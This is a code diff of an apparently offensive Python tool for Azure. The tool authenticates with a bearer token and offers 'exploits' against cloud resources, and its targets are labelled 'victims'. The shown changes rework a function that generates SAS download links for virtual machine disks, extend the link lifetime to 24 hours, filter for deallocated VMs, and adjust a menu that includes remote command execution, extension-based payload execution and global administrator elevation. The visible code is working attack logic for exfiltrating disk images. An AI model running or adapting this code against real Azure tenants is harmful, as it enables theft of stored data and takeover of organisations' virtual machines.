| skipped 285 lines |
286 | 286 | | item['resourceGroup'] = res['name'] |
287 | 287 | | result.append(item) |
288 | 288 | | return result |
289 | | - | def CON_GenerateVMDiskSAS(subscriptionId, resourceGroupName, vmDiskName): |
| 289 | + | def CON_GenerateVMDiskSAS(subscriptionId, resourceGroupName, vmDiskName, location): |
290 | 290 | | global Token |
291 | 291 | | headers = { |
292 | 292 | | 'Content-Type': 'application/json', |
293 | 293 | | 'Authorization': 'Bearer ' + Token |
294 | 294 | | } |
295 | | - | rs = requests.get("https://management.azure.com/subscriptions/"+subscriptionId+"/resourceGroups/"+resourceGroupName+"/providers/Microsoft.Compute/disks/"+vmDiskName+"/beginGetAccess?api-version=2021-12-01", |
| 295 | + | rs = requests.post("https://management.azure.com/subscriptions/"+subscriptionId+"/resourceGroups/"+resourceGroupName+"/providers/Microsoft.Compute/disks/"+vmDiskName+"/beginGetAccess?api-version=2022-03-02", |
296 | 296 | | json={ |
297 | | - | "access": "Read", |
298 | | - | "durationInSeconds": 300 |
| 297 | + | "access": "read", |
| 298 | + | "durationInSeconds": 86400 |
299 | 299 | | }, |
300 | 300 | | headers=headers) |
301 | | - | if rs.status_code == 200: |
302 | | - | DownloadURL = rs.json()['access'] |
303 | | - | return "Ready! SAS Download Link for " + vmDiskName + ": " + DownloadURL |
| 301 | + | |
| 302 | + | if rs.status_code == 202: |
| 303 | + | rsAsync = requests.get(str(rs.headers['Location']),headers=headers) |
| 304 | + | return "Disk Ready! The SAS Download For the next 24 hours (Disk:" + vmDiskName + "): " + rsAsync.json()['accessSAS'] |
304 | 305 | | else: |
305 | | - | return "Unable to create SAS Download Link." |
| 306 | + | return "Failed to generate SAS link for Disk." |
306 | 307 | | |
307 | 308 | | def CON_VMExtensionExecution(subscriptionId, location, resourceGroupName, vmName, PayloadURL): |
308 | 309 | | global Token |
| skipped 445 lines |
754 | 755 | | "Contributor/VMExtensionResetPwd", |
755 | 756 | | "Contributor/VMExtensionExecution", |
756 | 757 | | "Contributor/VMDiskExport", |
757 | | - | "Contributor/VMDiskSnapshotExport", |
758 | 758 | | "GlobalAdministrator/elevateAccess" |
759 | 759 | | ] |
760 | 760 | | readline.set_completer(SimpleCompleter(exploits).complete) |
| skipped 327 lines |
1088 | 1088 | | CmdFileContent = f.read() |
1089 | 1089 | | print(CON_VMRunCommand(victims[Selection]["subId"],victims[Selection]["rg"],victims[Selection]["os"],victims[Selection]["name"], CmdFileContent)) |
1090 | 1090 | | elif "Contributor/VMDiskExport" in ExploitChoosen and mode == "run": |
1091 | | - | print("Trying to list offline virtual machines.. (it might take a few minutes)") |
| 1091 | + | print("Trying to list deallocated virtual machines.. (it might take a few minutes)") |
1092 | 1092 | | victims = {} |
1093 | 1093 | | AllVMRecords = PrettyTable() |
1094 | 1094 | | AllVMRecords.align = "l" |
| skipped 1 lines |
1096 | 1096 | | AllVMRecordsCount = 0 |
1097 | 1097 | | for UserVMRecord in RD_ListAllVMs(): |
1098 | 1098 | | VMState = HLP_GetVMInstanceView(UserVMRecord['subscriptionId'],UserVMRecord['resourceGroup'],UserVMRecord['name']) |
| 1099 | + | if VMState != "PowerState/deallocated": |
| 1100 | + | continue |
1099 | 1101 | | victims[AllVMRecordsCount] = {"name": UserVMRecord['name'], "location": UserVMRecord['location'], "diskName": UserVMRecord['properties']['storageProfile']['osDisk']['name'],"subId": UserVMRecord['subscriptionId'],"rg": UserVMRecord['resourceGroup']} |
1100 | 1102 | | AllVMRecords.add_row([AllVMRecordsCount, UserVMRecord['name'], UserVMRecord['location'], UserVMRecord['properties']['storageProfile']['osDisk']['name'], VMState]) |
1101 | 1103 | | AllVMRecordsCount += 1 |
| skipped 1 lines |
1103 | 1105 | | TargetVM = input("Select Target DiskVM [i.e. 1]: ") |
1104 | 1106 | | print("Create a SAS link for VHD download...") |
1105 | 1107 | | Selection = int(TargetVM) |
1106 | | - | print(CON_GenerateVMDiskSAS(victims[Selection]["subId"], victims[Selection]["rg"], victims[Selection]["diskName"])) |
| 1108 | + | print(CON_GenerateVMDiskSAS(victims[Selection]["subId"], victims[Selection]["rg"], victims[Selection]["diskName"], victims[Selection]["location"])) |
1107 | 1109 | | |
1108 | 1110 | | elif "Contributor/VMExtensionExecution" in ExploitChoosen and mode == "run": |
1109 | 1111 | | print("Trying to list exposed virtual machines.. (it might take a few minutes)") |
| skipped 114 lines |